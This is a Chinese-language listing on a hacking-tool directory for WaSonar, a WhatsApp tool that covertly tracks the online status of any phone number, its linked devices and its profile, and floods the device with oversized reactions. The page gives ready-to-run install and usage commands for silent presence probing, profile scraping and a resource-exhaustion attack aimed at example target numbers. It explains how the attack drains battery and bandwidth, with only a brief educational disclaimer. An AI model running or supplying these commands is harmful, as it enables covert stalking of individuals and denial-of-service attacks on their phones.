Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WaSonar — WhatsApp情报与资源耗尽工具。特点包括实时设备追踪、静默RTT探测以及用于安全研究的协议压力测试。 | Kitploit
工具/GitHubGitHub/ajayantoisdev/wasonar
OSINT (开源情报)侦察漏洞分析漏洞利用信息收集渗透测试移动安全隐私保护
GitHubajayantoisdev/wasonar

WaSonar

WhatsApp情报与资源耗尽工具。特点包括实时设备追踪、静默RTT探测以及用于安全研究的协议压力测试。

查看仓库
51578个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
WaSonar 标志 截图

License Version Node.js

免责声明:本工具仅用于教育目的和安全研究。开发者不对滥用行为负责。请负责任且合乎道德地使用。

WaSonar 是一个强大的 CLI 工具,专用于 WhatsApp 协议上的教育研究、设备追踪和压力测试。基于 Baileys 构建。

功能 • 安装 • 用法


功能

  • 实时设备追踪:检测所有绑定设备(手机、网页、桌面)的精确在线/离线状态。
  • 设备发现:列出目标号码绑定的所有设备(主手机 + 附属设备)。
  • 资料提取:获取个人资料图片、状态/简介信息及 JID。
  • 资源耗尽:使用超大反应负载(激进/缓慢模式)淹没设备。

安装

通过 NPM(推荐)

root@kitploit:~
npm install -g wasonar-cli

通过 NPX(无需安装)

root@kitploit:~
npx wasonar-cli <command>

从源码安装

root@kitploit:~
git clone https://github.com/AjayAntoIsDev/wasonar.git
cd wasonar
npm install

用法

1. 登录

首先,你需要使用一个 WhatsApp 账号进行身份验证。

root@kitploit:~
wasonar-cli login

扫描终端中出现的二维码。

2. 设备发现

列出目标号码连接的所有设备。

root@kitploit:~
wasonar-cli devices <target-number>

# 示例:
wasonar-cli devices 919876543210

3. 在线状态与 RTT

核心功能。发送静默探测以检测设备是否在线并测量延迟。

root@kitploit:~
# 无限次探测(默认)
wasonar-cli online 919876543210

# 发送指定次数的探测
wasonar-cli online 919876543210 --probes 5

# 将结果保存到文件
wasonar-cli online 919876543210 --output ./logs

注意:PENDING/OFFLINE 表示服务器收到了消息,但目标设备未确认接收。

4. 资料提取

获取用户的个人资料图片和状态。

root@kitploit:~
# 显示信息并下载个人资料图片
wasonar-cli profile 919876543210 --output ./profiles

5. 资源耗尽

⚠️ 仅限教育用途。 发送高频超大负载。

root@kitploit:~
# 激进模式(默认:250 请求/秒,1KB 负载)
wasonar-cli exhaust 919876543210

# 缓慢模式(10 请求/秒,500B 负载)
wasonar-cli exhaust 919876543210 --aggression slow

# 设置持续时间
wasonar-cli exhaust 919876543210 --duration 30

方法论

静默探测

WaSonar 使用“静默删除探测”来检测在线状态,而不会惊动目标。

  1. 针对一个不存在的消息 ID 发送一条“已撤销”(删除)消息。
  2. 目标设备收到该“删除”请求。
  3. 如果设备在线,它会针对该协议消息发送一个 delivery_receipt(状态 3)。
  4. WaSonar 捕获该回执以确认在线状态并计算 RTT。

耗尽攻击

基于“Careless Whisper”研究,该攻击利用了 WhatsApp 反应处理中的验证漏洞。

技术细节

尽管无效的反应不会在目标手机上显示,但它们仍然会被接收和处理。

  • 负载限制:WhatsApp 服务器允许最大 1 MB 的反应负载。
  • 处理过程:客户端在丢弃这些消息之前会尝试处理它们(有效显示限制约为 30 字节),从而消耗资源。

影响分析

研究数据表明资源耗尽具有显著潜力:

  • 流量膨胀:单个会话可产生约 3.7 MB/s(13.3 GB/小时)的隐蔽流量。
  • 电池消耗:快速处理这些消息可在待机状态下使现代智能手机(测试机型:iPhone 13 Pro、S23)的电池每小时消耗 14-18%。
  • 拒绝服务:带宽消耗可能导致受害者设备上其他应用程序无法使用。

引用

基于 Gegenhuber 等人(维也纳大学及 SBA 研究机构)的研究:

root@kitploit:~
@inproceedings{gegenhuber2024careless,
  title={Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers},
  author={Gegenhuber, Gabriel K. and G{\"u}nther, Maximilian and Maier, Markus and Judmayer, Aljosha and Holzbauer, Florian and Frenzel, Philipp {\'E}. and Ullrich, Johanna},
  year={2024},
  organization={University of Vienna, SBA Research}
}

由 AjayAnto 创建

下载工具